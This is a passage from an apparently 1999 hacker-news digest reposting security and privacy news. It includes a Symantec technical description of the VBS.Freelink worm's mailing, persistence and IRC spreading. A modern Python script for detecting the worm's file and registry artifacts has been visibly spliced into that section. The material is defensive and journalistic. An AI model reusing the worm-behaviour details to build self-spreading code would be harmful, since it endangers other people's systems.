      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      From HNN http://www.hackernews.com/

      contributed by Ir0nMaiden 
      [Translated from Chinese]
      The Ministry of Information Industry, Ministry of Public
      Security, and Ministry of State Security in Hong Kong
      issued a joint memorandum urging all state and private
      organizations to not connect internal computer systems
      to the world wide internet. This is in direct response to
      the threat of cyber attack from Taiwanese intruders.
      The Ministry of Information and Industry have also
      established the China Computer Network Security
      Management Center. Fearing that imported computers
      and software may contain security holes, Trojan Horses,
      or Backdoors the ministry is also asking that the
      development of domestically-made computers and
      software systems be increased. 
      
      Hong Kong Ming Pao
      http://www.mingpao.com/newspaper/
      (Chinese)
      
      @HWA
      
12.0  Amnesty Program for Pirated Software Fails Miserably 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      An amnesty program for pirated software, sponsored by
      Microsoft and Adobe, failed to get even one copy of
      pirated software. While several people went to the
      event for the free t-shirts and other goodies, not one
      person showed up with software they thought might
      have been pirated. 

      SF Gate
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/1999/10/16/BU18704.DTL
      

      S.F. Treasure Hunt for Pirated Software Flops
      Rally for turn-ins fails to produce any of the illegal booty

      Benny Evangelista, Chronicle Staff Writer
      Saturday, October 16, 1999

      Microsoft Corp. attorney Anne Murphy was hoping people who were using 
      pirated software would drop on by Justin Herman Plaza to turn in their 
      illegal booty. 

      But to perhaps nobody's surprise but her own, yesterday's mildly 
      publicized ``Ask If It Is Licensed'' event did not draw one single 
      repentant soul. 

      There were plenty of folks who came for the free T-shirts and free 
      software. And at least one man was more concerned about a different sort 
      of intergalactic fraud. 

      Maybe Microsoft should have called the event ``Ask, But Don't Tell.'' 

      ``We're disappointed,'' said Murphy, the chief anti-piracy enforcement 
      official for the Redmond, Wash., software colossus. She said a similar 
      event in San Diego drew about 40 computer sellers who wanted to see if 
      their software was legit, and ``the vast majority was counterfeit.'' 

      Microsoft and publishing software-maker Adobe Systems of San Jose 
      sponsored the event to publicize how consumers can tell if their software 
      was illegally copied and to evangelize about the evils of piracy. 

      The companies weren't there to throw violators in the slammer but would 
      have exchanged genuine software for illegal copies. Then the illegal 
      programs would serve as evidence to hunt down the real perpetrators -- the 
      people who actually copied and sold the software. 

      Piracy cost the California economy an estimated 18,000 jobs and $244 
      million in lost tax revenue in 1998. The estimated rate of illegal 
      software installed statewide last year was about 29 percent, about eight 
      percentage points higher than in 1997. 

      Software piracy includes both individuals and companies that make and 
      distribute illegal copies of legal software and criminals who make and 
      sell counterfeit software. 

      In a separate ceremony in Palo Alto, Gov. Gray Davis signed an executive 
      order setting government policy for state agencies to use only legal 
      copies of software. President Clinton signed a similar order covering 
      federal agencies a year ago. 

      Yesterday, Microsoft also filed federal suits against four Northern 
      California computer sellers, including one in Fremont. Microsoft has filed 
      more than 160 similar suits nationwide in the past year. 

      The people who drifted by during the four-hour event mostly appeared to be 
      workers enjoying the midday sun rather than software desperadoes. 

      Passers-by interviewed agreed that using illegal software was bad, 
      although only a few said they would actually walk up to Microsoft 
      admitting their deed if they were. Some even ranked shoplifting a candy 
      bar as a worse crime. 

      One 29-year-old accountant from Dublin happily admitted sharing his copy 
      of Chessmaster 3000 with 10 friends. 

      ``I bought it, and I can give it to my friends if I want,'' said the man, 
      who didn't want to give out his name for fear Microsoft enforcers ``would 
      get bored one day and send their legal team after me.'' 

      Frank Chu, 39, of Oakland didn't care about software at all. He was trying 
      to get in front of television cameras with a sign that read, ``Impeach 
      Clinton. 12 Galaxies Guiltied to A Techtronic Rocket Society.'' 

      ``Clinton has freely committed treason against 12 galaxies,'' Chu 
      explained. 

      Murphy hoped no one would take the free software given to a select few in 
      the crowd and make copies.

      ``For someone to learn about piracy and then go out and negatively impact 
      the California economy would be a little bit cheeky,'' Murphy said. 

      Australian tourist Quentin Chester said software piracy wasn't high on his 
      list of concerns. 

      ``In Australia, we don't tend to be fussed about this stuff,'' said 
      Chester, 41. ``Australians are pretty laid back.''     
      
      @HWA
      
13.0  A New Look at InfoWar 
      ~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/

      contributed by M0ney 
      Is Cyberwarfare about Denial of Service Attacks, web
      page defacements, and network break-ins? Or is it more
      about Information dissemination, media manipulation and
      good ole propaganda? The Zapatista guerrillas, fighting
      for their freedom in Mexico, use the Internet to their
      advantage but not in a way you might think. 

      Time      
      http://www.pathfinder.com/time/magazine/articles/0,3266,32558,00.html
      

      TIME SPECIAL REPORT/THE COMMUNICATIONS REVOLUTION/LANGUAGES OF TECHNOLOGY
      OCTOBER 11, 1999 VOL. 154 NO. 15

      Wired For Warfare
      Rebels and dissenters are using the power of the Net to harass and attack
      their more powerful foes
      BY TIM MCGIRK/MEXICO CITY

      In the Chiapas jungles of southern Mexico during the mid-1990s, Zapatista 
      guerrillas--fighting for the rights of Mayan peasants--evolved a new 
      method of conflict: "cyberwar." A mode of battle that involves the 
      Internet and other forms of telecommunication, cyberwar, or Netwar, is 
      employed with increasing frequency by rebels, terrorists and governments 
      around the world. A Netwar can be pure propaganda, recognition that modern 
      conflicts are won as much by capturing headlines as by capturing 
      territory. But a Netwar can have more dangerous applications when computer 
      viruses or electronic jamming are used to disable an enemy's defenses, as 
      both Serb and NATO hackers proved in Kosovo by unleashing barrages of 
      propaganda and attempting to bring down each others' telecommunications 
      systems.

      When they rebelled in 1994, the poorly armed Zapatistas were no match for 
      the Mexican army in Chiapas. But their spokesman, Subcomandante Marcos, is 
      an agile media manipulator. A renegade college professor who hides his 
      face in a ski mask, Marcos titled his Ph.D. dissertation The Power of the 
      Word. In the battle for public sympathy, he knows his laptop is a more 
      effective weapon than an AK-47 Kalashnikov rifle. Using a network of 
      universities, churches and non-governmental organizations (NGOs) in 
      Mexico, the U.S. and Canada--all linked through the Internet--Marcos 
      mobilized international pressure to make the government cease its assaults 
      against the Zapatistas. When the Mexican army declared in December 1994 
      that it had surrounded the 12,000 rebels, Marcos dispatched news that the 
      Zapatistas had slipped out of the trap and conquered dozens of villages. 
      It wasn't true, but according to cyberwar specialists the Zapatistas' 
      disinformation campaign caused enough confusion to help touch off a run on 
      the peso, plunging Mexico into recession.

      The Zapatistas' tactics also attracted the attention of military 
      strategists. The U.S. Army, for one, sponsored a 1998 study on the group's 
      tactics by the Rand think-tank. "Marcos is not a computer geek," says John 
      Arquilla, a defense information expert at the U.S. Naval Postgraduate 
      School in Monterey and co-author of the Rand report The Zapatista Social 
      Netwar in Mexico. "He's more committed to the idea of info revolution."

      That revolution is spreading. These days missiles are not only tipped with 
      warheads but with video cameras; television and radio deliver war news as 
      it happens; and alleged eyewitness accounts of battles and massacres 
      appear on the Internet, quickly finding their way into other media. What 
      matters in today's combat, says Arquilla, "is whose story wins." Not 
      surprising, then, that 12 of the 30 terrorist organizations identified by 
      the U.S. State Department have their own websites. Armies are also 
      entering this digital arena. Sweden's leading military college recently 
      graduated several infowar specialists, and the American military academy 
      West Point is expected to add cybercombat to its curriculum.

      In Netwar, governments are often at a disadvantage against rebel groups or 
      terrorists. Since they are hierarchies, governments are digital sitting 
      ducks, easy prey for electronic attacks. Groups like the Zapatistas and 
      Burmese dissidents fighting the military regime in Rangoon, on the other 
      hand, use swarms of loosely organized "hacktivists" to strike at 
      governmental computer networks. The hackers strike, then swiftly disperse 
      into cyberspace. The rebels' electronic battle station is seldom inside 
      the country they are targeting, and tracing it back through the Net can be 
      like trying to find the door in a hall of mirrors. The Zapatistas' first 
      websites, for example, were based in the U.S., while Colombia's 
      Revolutionary Armed Forces (FARC) guerrillas are in Europe, and Serb Net 
      propagandists relied on sympathizers in Eastern Europe during the Kosovo 
      crisis.

      One of the most novel weapons in the Zapatistas' digital arsenal is the 
      Electronic Disturbance Theater, which operates out of New York City. These 
      Net activists specialize in virtual sit-ins. Using a JavaScript tool 
      called FloodNet, the group organizes thousands of online protesters to 
      invade a Mexican government website with up to 600,000 hits a minute, 
      normally bringing it to a grinding halt. "We're not into blowing people up 
      or hacking sites," says one of the Theater's founders, Ricardo Dominguez. 
      "We just want to create a small force field that will disturb the pace of 
      power." He predicts that soon peasant farmers in Chiapas will be able to 
      protect themselves from assaults by security forces with "wireless video 
      uploads" that can secretly record incidents of police or army brutality 
      and transmit live on the Internet. According to Dominguez, this would 
      enable viewers to circulate the faces and badge numbers of assailants to 
      human rights groups.

      
      The art of Netwar is rapidly advancing. Cyberwar is "in its early stages," 
      says the U.S. Naval Postgraduate School's Arquilla, "but it's the 
      harbinger of a new kind of warfare." According to Dorothy Denning, a 
      professor of computer science at Georgetown University, the Kosovo 
      conflict was "the first war fought on the Internet." Air strikes targeted 
      television and radio stations controlled by the Serbs, but NATO 
      deliberately spared the four Internet servers in Yugoslavia from its 
      bombardments. The aim was to let Yugoslavs tap into news on the conflict 
      free from Serb censorship. But this ploy backfired. The Yugoslav 
      government seized control of the servers and used them to pour out 
      pro-Serb propaganda. Their aim, nearly successful, was to weaken the 
      resolve of NATO countries.

      No challenge to NATO's domination of the skies, the Serbs held their own 
      in the Internet trenches. Serb hackers also used the servers and satellite 
      links left intact by NATO to break into government and industry computers 
      belonging to members of the alliance, disrupting services and defacing 
      websites. NATO hackers did the same to Serb sites. Serb computer experts 
      also lobbed "e-mail bombs" at U.S. government facilities, clogging the 
      systems.

      Digital sabotage is rife in Asia, too. In the week after the results of 
      East Timor's referendum on independence were announced, the Department of 
      Foreign Affairs received hundreds of e-mail "letter bombs" designed to 
      disable government computers. "Without a firewall, [the e-mail] would have 
      contaminated the system," says a source within the department. In Taiwan 
      and China, supporters and opponents of Taiwan's bid for statehood 
      regularly hack into and deface each other's websites.

      Some Netwar experts concede the limitations of this kind of combat. 
      Jamming governmental websites may be a nuisance to the Mexicans, for 
      example, but it is unlikely to scare the administration into surrendering 
      to the Zapatistas. Nevertheless, argues Georgetown's Denning, "An 
      electronic petition with a million signatures may influence policy more 
      than an attack that disrupts emergency services."

      Others, like Zapatista activist Dominguez, view cyberwar as a more 
      civilized alternative to blood-and-guts fighting. "I'd much rather see 
      extremists take down an Internet server than go around killing people," he 
      says. For the Zapatistas, fighting a Netwar may have saved them from 
      extermination, winning the rebels widespread international support. Marcos 
      often compares himself to the cartoon character Speedy Gonzalez. Like this 
      quick-witted mouse, Marcos used the Internet to run rings around his 
      bigger foes. His comrades in other countries may well follow his lead. 

      --WITH REPORTING BY JASON TEDJASUKMANA/JAKARTA
      
      @HWA
      
            
14.0  Another Security Challenge 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Yazmon 
      The Shanghai Waigaoqiao Free Trade Zone Network
      Development Co. is offering a whopping $600 (5,000
      yuan) to anyone who can defeat the security of its
      website within the next week. (I hope companies aren't
      thinking that this sort of thing will actually test
      anything.) 

      Reuters- (Url outdated)
      
      @HWA
      
15.0  University Shutdown After Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      Wittenberg University in Columbus OH, had to
      completely shut down their web and email system after
      an electronic break in. During the shutdown the school
      installed various security improvements that make it
      harder for off-campus students to use the school's
      e-mail. The alleged attack occurred Sept. 12 and was
      traced to Australia. 

      Associated Press- via Cleveland Plain Dealer      
      http://www.cleveland.com/news/pdnews/metro/oa17hac.ssf
      
      Hackers force college to close Web,
      e-mail servers 

      Monday, October 18, 1999

      By ANDREW WELSH-HUGGINS ASSOCIATED PRESS

      COLUMBUS - Hackers who invaded Wittenberg University's computers last 
      month forced the institution to shut down its e-mail system and Web site. 
      Their attack also resulted in security improvements that make it harder 
      for off-campus students to use the school's e-mail.

      University President Baird Tipson said the attack occurred Sept. 12 and 
      was traced to Australia. The hackers also struck at least three other Ohio 
      colleges in the same assault.

      "The major cost has been enormous amounts of our computing staff time that 
      we desperately needed," Tipson said. "We're all trying to make sure we're 
      Y2K compliant. We believe that we are now, but we wouldn't have taken two 
      or three weeks of their time to spend on this project."

      Tipson revealed details of the attack as he testified before lawmakers 
      about the need for using part of Ohio's $10.1 billion tobacco settlement 
      to pay for more technology for colleges.

      Wittenberg, with 2,060 students, is a private liberal arts university in 
      Springfield.

      Joe Deck, director of computing services at Wittenberg, said the attack 
      occurred just before noon on a Sunday.

      He said several employees of his department were working on Y2K compliance 
      systems and noticed intruders in the system after about 10 minutes.

      They immediately shut down the university's Web and e-mail servers and 
      isolated Wittenberg's connection to the Internet.

      Deck said the hackers' expertise was "very well organized" and said he 
      chose not to let them stay in the system longer, even though that might 
      have increased the chance of identifying the culprits.

      Since then, university employees have spent at least 2,000 hours 
      rebuilding passwords, improving the software "firewall" that protects the 
      system and putting other security precautions into effect.

      From users' perspective, things are back to normal, although work on 
      internal systems still needs to be done, Deck said.

      Deck, Tipson and other officials would not identify the other three Ohio 
      colleges attacked. Tipson said the work Wittenberg did in reaction to the 
      attack cost in the "low six figures."

      Economics Professor Jeff Ankrom said he uses the Internet extensively in 
      his classes.

      For about two weeks, "I felt almost immobilized," Ankrom said. "My Web 
      site for classes was frozen in time, and I found myself being locked into 
      the old mode of doing things, making announcements in class, handing out 
      slips of paper, worrying about who got them, who didn't."

      Wittenberg junior Ethan Grefe said the situation was a serious problem for 
      off-campus students, since they weren't able to access their e-mail for 
      several days.

      "At first, I think the general atmosphere was one of astonishment, that 
      somebody from Australia came and hacked into our system. It was just kind 
      of weird," said the 20-year-old from Toledo. "As it went on for a couple 
      of weeks, people were getting pretty aggravated."
      
16.0  More Melissa Strains 
      ~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      Melissa.U, Melissa.V, and VBS.Freelink are new Melissa
      strains that are spreading across the internet. While this
      article doesn't provide any new information it does give
      some background as to what has been going on in the
      AV world recently. 

      Yahoo News      
      http://dailynews.yahoo.com/h/zd/19991016/tc/19991016310.html
      
      Saturday October 16 03:36 PM EDT

      Melissa-like viruses haunt firms

      Robert Lemos, ZDNet

      Spiritual descendants of the Melissa computer virus have appeared over the 
      last month, haunting at least 10 companies, according to anti-virus firms. 

      Recently, two variants of the Melissa virus -- Melissa.U and Melissa.V -- 
      and VBS.Freelink, a Visual Basic script virus with a Melissa-like MO, have 
      been infecting the unprepared. 

      Just ask Design Continuum Inc., a West Newton, Mass.-based industrial 
      design firm that spent 40 man-hours cleaning up after a recent virus 
      outbreak. 

      Two weeks ago, Tim Cronin, Design Continuum's director of business 
      development, received an e-mail from a client with the subject line "Check 
      this." Without thinking, Cronin opened the attachment, which was infected 
      with VBS.Freelink. 

      "Within 45 minutes, I looked back at my screen and saw 60 messages from 
      outside sources asking what had I done, and my IS (information systems) 
      manager was on the phone asking me what had happened," Cronin told ZDNN 
      in an interview. 

      VBS.Freelink is a relatively benign virus that spreads quickly, but does 
      not damage data. Still, in spreading, the virus can create quite a bit of 
      carnage, said Cronin. By the time he realized what had happened, all 85 of 
      the firm's employees had received the attachment and enough had 
      opened the e-mail that the company's servers quickly filled to 
      overflowing, rejecting incoming messages. 

      "We invested at least a man-week in cleaning it up (over four days)," he 
      said. 

      E-mailed from trusted source

      Design Continuum -- and its unnamed 
      clients -- had fallen victim to the trick that made Melissa so virulent: 
      its packaging. "I received the original e-mail from a source that I 
      recognized as my client, so I felt trusting enough to open (the 
      attachment)," he said. 

      In fact, the social engineering was so good that, when several recipients' 
      anti-virus software deleted the infected mail, they wrote back to Cronin, 
      asking him to re-send the document. 

      "There is a good bet that I would have been immune as well if I had 
      updated my anti-virus suite," he said. 

      Lull between storms?

      Design Continuum seems to be in the minority, 
      however. Overall, companies and home users alike seem to have taken to 
      heart the lessons of Melissa: Be suspicious of all attachments and 
      regularly update your anti-virus software. 

      "The shock value of Melissa was good for education," said Chengi "Jimmy" 
      Kuo, director of anti-virus research for security software firm Network 
      Associates Inc. "Corporations are much more attuned to e-mail-based 
      viruses. Anytime they hear about a virus, they want to know about it 
      and get a cure immediately." 

      Anti-virus firm and NAI rival Trend Micro Inc. reported only six companies 
      infected with the Melissa variants in the past week; four others have been 
      hit with Freelink. "We are just in the 'Variations on a Theme' period 
      right now," said Susan Orbuch, director of communications for Trend 
      Micro. 

      The anti-virus firms regard the past few months as a lull between storms. 

      "It takes a while for virus writers to come out with something new," said 
      NAI's Kuo. "Most viruses are by virus writers who have taken the code and 
      tweaked it." 

      While a "tweaked" computer virus may not be identified by anti-virus 
      software due to its different fingerprint, all major anti-virus software 
      also has heuristics to pick out modified viruses. 

      "The recent viruses are nastier (more destructive) than Melissa," said Trend 
      Micro's Orbuch, "but our heuristics are catching them because they are 
      only variants -- they are not new." 

      Luck is a large factor as well. Anti-virus vendors who find out about a 
      virus before it enters the wild can limit any damage and distribute new 
      detection data -- known as "definitions" -- for their software. 

      Yet, while the current crop of code being generated by virus writers is 
      not original, the anti-virus firms are worried that some virus writer will 
      learn how to make a true e-mail virus -- one that does not require the 
      user to act at all. 

      "There are techniques for attacking directly -- without needing the user 
      to open an attachment," said NAI's Kuo. "Such (Melissa-like) viruses are 
      not out of the picture yet." 
      
      
      -=-
      

      VBS.Freelink 

                Aliases: Freelink, VBS.Freelink
      Area of Infection: \Windows and \Windows\System folder
             Likelihood: Common
            Detected on: July 2, 1999
        Characteristics: Trojan Horse, Worm




      Description 

      VBS.Freelink is a virus discovered in July 1999. Symantec AntiVirus
      Research Center has recently been receiving an increase in VBS.Freelink virus
      reports from our customers. To protect yourself from this virus, all Norton
      AntiVirus customers should ensure their virus definitions are up to date by
      using the LiveUpdate feature. In order to detect the VBS.Freelink virus, it is
      necessary to scan files with the VBS filename extension. It is recommended to
      use the options in NAV to scan "All files" rather than using the "Program Files"
      option. Please note that this may cause performance issues depending on the
      software, hardware and configurations you are using. Newer versions of
      Norton AntiVirus ship with scan "All files" as the default configuration. If
      you choose only to scan "Program Files", please make sure that the
      configuration in Norton AntiVirus includes the "VBS" file extension as well as
      the following file extensions in the "Scanner" and "AutoProtect" options. 

      Recommended Extension List as of Oct 5, 1999: 

      386, ADT, BIN, CBT, CLA, COM, CPL, CSC, DLL, DOC, DOT, DRV,
      EXE, HTM, HTT, JS, MDB, MSO, OV?, POT, PPT, RTF, SCR, SHS,
      SYS, VBS, XL? 

      Technical Notes 

      VBS.Freelink is an encrypted worm that will work under Windows 98,
      Windows 2000 and all other Windows versions that support the VB Scripting language.
      Once the worm is launched, it will use MS Outlook to automatically send an
      email with an attachment of itself. Similar to the Melissa virus, this worm uses
      MAPI calls to get user profiles from MS Outlook. The contents of the email
      generated by this worm are: 

           Subject: Check this

           Have fun with these links. Bye.

      When the attached file is executed, it will create the following two files: 

           C:\WINDOWS\LINKS.VBS
           C:\WINDOWS\SYSTEM\RUNDLL.VBS 

      It will also create a file called LINKS.VBS in the root of all network drives
      that are currently mapped. Next, the worm will modify the following registry
      entry so that the worm runs every time the machine boots up: 

           HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Rundll=RUNDLL.VBS 

      After infecting a system, it will display a dialog box titled "Free XXX links"
      with the following content: 

           This will add a shortcut to free XXX links on 
           your desktop. Do you want to continue.

      If the user selects yes, it will create a shortcut pointing to an adult web site. 

      It also searches for MIRC32.EXE and PIRCH98.EXE chat programs in
      C:\MIRC, C:\PIRCH98, C:\PROGRAM FILES and the subdirectories of
      each of these directories. If it finds either of these programs, it will modify the
      corresponding SCRIPT.INI file or EVENTS.INI located in the same
      directory. These INI files will cause LINKS.VBS to be sent to other people
      during the IRC sessions. 



      Norton AntiVirus users can protect themselves from this worm by
      downloading the current virus definitions either through LiveUpdate or from
      the following webpage: 

      http://www.symantec.com/avcenter/download.html 

      Write-up by: Abid Hussain Oonwala
      October 5th, 1999
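
      The host artifacts listed in the write-up above (the two dropped files,
      LINKS.VBS in a drive root, the Rundll autostart value and the altered
      IRC script files) can be checked mechanically. The Python script below
      is an added example, not part of the Symantec write-up or of any vendor
      tool. It assumes the suspect drive is mounted or copied under a
      directory and that the Run key was exported as text with regedit; all
      function names and the sample data are constructed for illustration.

```python
import os
import re
import tempfile

# Indicators from the write-up, relative to a drive root so that a mounted
# image or a copied tree can be checked. All names here are illustrative.
DROPPED = [("WINDOWS", "LINKS.VBS"), ("WINDOWS", "SYSTEM", "RUNDLL.VBS"),
           ("LINKS.VBS",)]  # last entry: root of a mapped network drive
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
IRC_CLIENTS = {"MIRC32.EXE", "PIRCH98.EXE"}
IRC_INIS = {"SCRIPT.INI", "EVENTS.INI"}
IRC_DIRS = [("MIRC",), ("PIRCH98",), ("PROGRAM FILES",)]


def resolve_ci(root, parts):
    """Resolve path components case-insensitively, as Windows would."""
    path = root
    for part in parts:
        names = os.listdir(path) if os.path.isdir(path) else []
        match = next((n for n in names if n.upper() == part.upper()), None)
        if match is None:
            return None
        path = os.path.join(path, match)
    return path


def check_dropped_files(root):
    """Report the files the worm is described as creating."""
    found = [(p, resolve_ci(root, p)) for p in DROPPED]
    return ["dropped file: " + "\\".join(p)
            for p, path in found if path and os.path.isfile(path)]


def check_run_key(reg_export):
    """Find the Rundll=RUNDLL.VBS autostart value in a regedit text export."""
    section, hits = "", []
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        m = re.match(r'"([^"]+)"="(.*)"$', line)
        if (m and section == RUN_KEY and m.group(1).lower() == "rundll"
                and m.group(2).upper().endswith("RUNDLL.VBS")):
            hits.append("autostart value: Rundll=" + m.group(2))
    return hits


def check_irc_scripts(root):
    """Flag SCRIPT.INI/EVENTS.INI beside an IRC client if it names LINKS.VBS."""
    hits = []
    for top in filter(None, (resolve_ci(root, p) for p in IRC_DIRS)):
        for dirpath, _dirs, files in os.walk(top):
            upper = {f.upper(): f for f in files}
            if not IRC_CLIENTS & set(upper):
                continue
            for ini in sorted(IRC_INIS & set(upper)):
                ini_path = os.path.join(dirpath, upper[ini])
                with open(ini_path, errors="replace") as fh:
                    if "LINKS.VBS" in fh.read().upper():
                        hits.append("IRC script names LINKS.VBS: "
                                    + os.path.relpath(ini_path, root))
    return hits


def triage(root, reg_export=""):
    """Run every check; an empty list means none of the listed artifacts."""
    return (check_dropped_files(root) + check_run_key(reg_export)
            + check_irc_scripts(root))


# Constructed sample data: harmless placeholder files, no worm code.
SAMPLE_TREE = {
    "WINDOWS/LINKS.VBS": "' placeholder\n",
    "WINDOWS/SYSTEM/Rundll.vbs": "' placeholder\n",
    "MIRC/mirc32.exe": "",
    "MIRC/script.ini": "[script]\nn0=; constructed line naming links.vbs\n",
    "PROGRAM FILES/PIRCH98/PIRCH98.EXE": "",
    "PROGRAM FILES/PIRCH98/events.ini": "[Levels]\n",
}
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Rundll"="RUNDLL.VBS"
"""


def build_sample(root):
    for rel, body in SAMPLE_TREE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print("\n".join(triage(tmp, SAMPLE_REG)))
```

      A file name alone is weak evidence; a hit here is a reason to scan the
      machine with current definitions, as the write-up recommends.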

      @HWA

                                                                                  
17.0  Loyalty Cards are Not As Private As People Think 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      Just how private is the information gathered by
      Customer Loyalty Cards? We're talking about those
      bar-coded cards that give shoppers at supermarkets
      and other stores up to a 15 percent discount in return
      for tracking what you buy. Supermarkets say that the
      data they gather is never sold or divulged to third
      parties. A search warrant is another matter. If an
      ex-spouse wants to discover if you're a good parent they
      can subpoena the supermarket records. And no one
      really knows how secure these databases are. 

      Nando Times
      http://www.techserver.com/noframes/story/0,2294,500046068-500075236-500169924-0,00.html
      
      Privacy concerns leave customers wary of grocery cards 

      Copyright 1999 Nando Media
      Copyright 1999 Scripps Howard News Service

      By MARY DEIBEL 

      ARLINGTON, Va. (October 16, 1999 1:43 a.m. EDT http://www.nandotimes.com) 
      - Even though Safeway Club Card member Lois Diehl McDonley doesn't mind 
      others knowing her shopping habits, she has a tip for those who do: Pay 
      separately in cash for purchases you want kept private and use the 
      discount card for the rest. 

      "It's your business if you don't want people knowing if you buy 
      cigarettes, alcohol, certain reading materials or some other item, but 
      those things don't usually get discounts anyway," says McDonley, a 
      57-year-old medical secretary and mother of two. "Segregating your 
      goods the way you do if you run an errand for a neighbor or need a receipt 
      to be reimbursed at work not only protects your privacy, it messes up Big 
      Brother's data base," she says. 

      But Safeway says it doesn't sell or lease information about individual 
      club card customers. 

      "Privacy has never been an issue," says spokeswoman Karen Darnells from 
      company headquarters in Pleasanton, Calif. "Club card members and their 
      identities are kept strictly confidential." 

      It's the same at other grocery chains that see the bar-coded rewards cards 
      as a weapon in the battle for customer business in the $400-billion-a-year 
      grocery wars: The cards typically carry discounts of 15 percent or more on 
      specified goods in return for customers letting the stores build 
      detailed personal profiles from their purchases. 

      "We have an absolutely strict policy that we do not share that information 
      with any third party," said Kroger spokesman Gary Rhodes. Kroger currently 
      is the top-selling supermarket in the nation. 

      However, Rhodes and spokesmen for other big markets, including No. 2 
      Albertson's, No. 3 Wal-Mart, No. 4 Safeway and No. 5 Ahold USA agree that 
      information can and will be surrendered to law enforcement authorities 
      armed with a court order. 

      Nob Hill Foods in the San Francisco Bay area and Wild Oats natural food 
      stores out of Boulder, Colo., did away with loyalty cards in response to 
      customer surveys. 

      Privacy experts say there's nothing to keep loyalty card data secret from 
      a subpoena if someone is being sought in a criminal case or caught in a 
      child custody fight. 

      "You may innocently buy junk food, a pregnancy kit or over-the-counter 
      sleeping aids, but how would it look if you decided to run for the school 
      board or mayor 10 years from now?" says Judith DeCew, a Clark University 
      professor and author of "In Pursuit of Privacy: Law, Ethics & the 
      Rise of Technology" (Cornell University Press, 1997). 

      "Whatever promises retailers make, nobody can be sure who has access to 
      their data warehouses, and that goes for all kinds of stores, not just 
      supermarkets," she says. 

      "Internet e-tailers are especially aggressive when collecting data on 
      customers: Look at how Amazon.com targets your book-buying and music 
      interests, and consider that it's setting itself up as a worldwide virtual 
      mall, and remember what was made of Monica Lewinsky's book purchases 
      in the real world." 

      California last week became the first state in the nation to limit the 
      information that grocery stores can require as a condition for signing up 
      for reward cards: A new state law stops stores from requiring would-be 
      club card members to list driver's license or Social Security 
      numbers. The statute also makes it illegal to rent or sell customer names, 
      even though stores say they don't as a matter of policy. 

      "Grocery shoppers will no longer have to risk their privacy to save a few 
      dollars on grocery purchases," California state Sen. Jackie Speier, D-Daly 
      City, says. 

      So far, federal authorities have been slow to safeguard shoppers' privacy. 
      What few steps they've taken include prohibitions on: 

      - Release of video rental lists after Robert Bork's viewing preferences 
      made it into press accounts in the midst of his failed 1987 Supreme Court 
      bid. 

      - Third-party interceptions of cell phone calls, which prompted a fine for 
      a Florida couple who passed on a taped conversation in which Rep. John 
      Boehner, R-Ohio, was overheard plotting strategy with fellow House 
      Republican leaders during an attempted overthrow of then-House 
      Speaker Newt Gingrich of Georgia. 

      - Internet firms collecting personal data from youngsters. Anyone older 
      than 14, however, presumably is old enough to check a Web site's privacy 
      policy or look for labels such as those voluntarily adopted by the On-line 
      Privacy Alliance, to which nearly 100 corporations and associations 
      belong. 

      Another voluntary privacy program is BBBOnLine, which just awarded its 
      100th privacy seal with more than 400 applications still in the pipeline. 
      BBBOnLine chief operating officer Robert Bodoff says firms that qualify 
      are banking on privacy being good business for them and for their 
      customers and "helping to build confidence in on-line commerce." 

      Marketing expert Martha Rogers of Bowling Green University agrees: "The 
      future of one-to-one marketing in which a customer is willing to sell some 
      privacy in return for letting the retailer buy information about that 
      person's buying preferences depends on building trust," she says. 

      Rogers adds that the relationship may involve getting Americans to "shop 
      in new ways: You can always slide what you don't want anyone to know 
      you're buying into a second shopping cart and forgo the discount." 

      If that advice sounds familiar, it's Lois Diehl McDonley's advice, too, 
      gleaned from years as a supermarket shopper. Take discounts if you want to 
      and skip them where you feel your privacy could be compromised, she says, 
      and, oh yes, "chill out a little" in the bargain. 

      As she sees it, "Some people might be embarrassed, but I can't fathom 
      who'd be remotely interested in the stuff I buy." 

      Mary Deibel is a reporter for Scripps Howard News Service. 

      @HWA


18.0  Interview With the Cult of the Dead Cow 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evenprime 
      Slashdot is hosting an email interview with the Cult of
      the Dead Cow. They will be gathering questions until
      this afternoon and then posting the responses on
      Friday. 

      The Cult of the Dead Cow
      http://www.cultdeadcow.com
      
      Slashdot
      http://slashdot.org/interviews/99/10/18/0939245.shtml
      
      @HWA
      
19.0  Amazon.com Hosts Crypto Challenge 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Kiad Arch'August 
      Amazon has posted an interesting challenge for home
      cryptography buffs. Break their code and win books,
      Lego Mindstorms, and bragging rights. 

      Amazon.com      
      http://www.amazon.com/exec/obidos/redirect?tag=thehackernewsnet&path=subst/promotions/crypto/crypto-contest.html
      
      Crack the Code
      Do You Have the Skills to Win the Contest?

      Welcome to Amazon.com's Cryptography Contest, where you can test your 
      decryption skills and win a swell prize package chock full of geek 
      goodies--signed copies of four classic crypto books, and a brain-bending 
      programmable robot kit! You don't need any special math skills to decrypt 
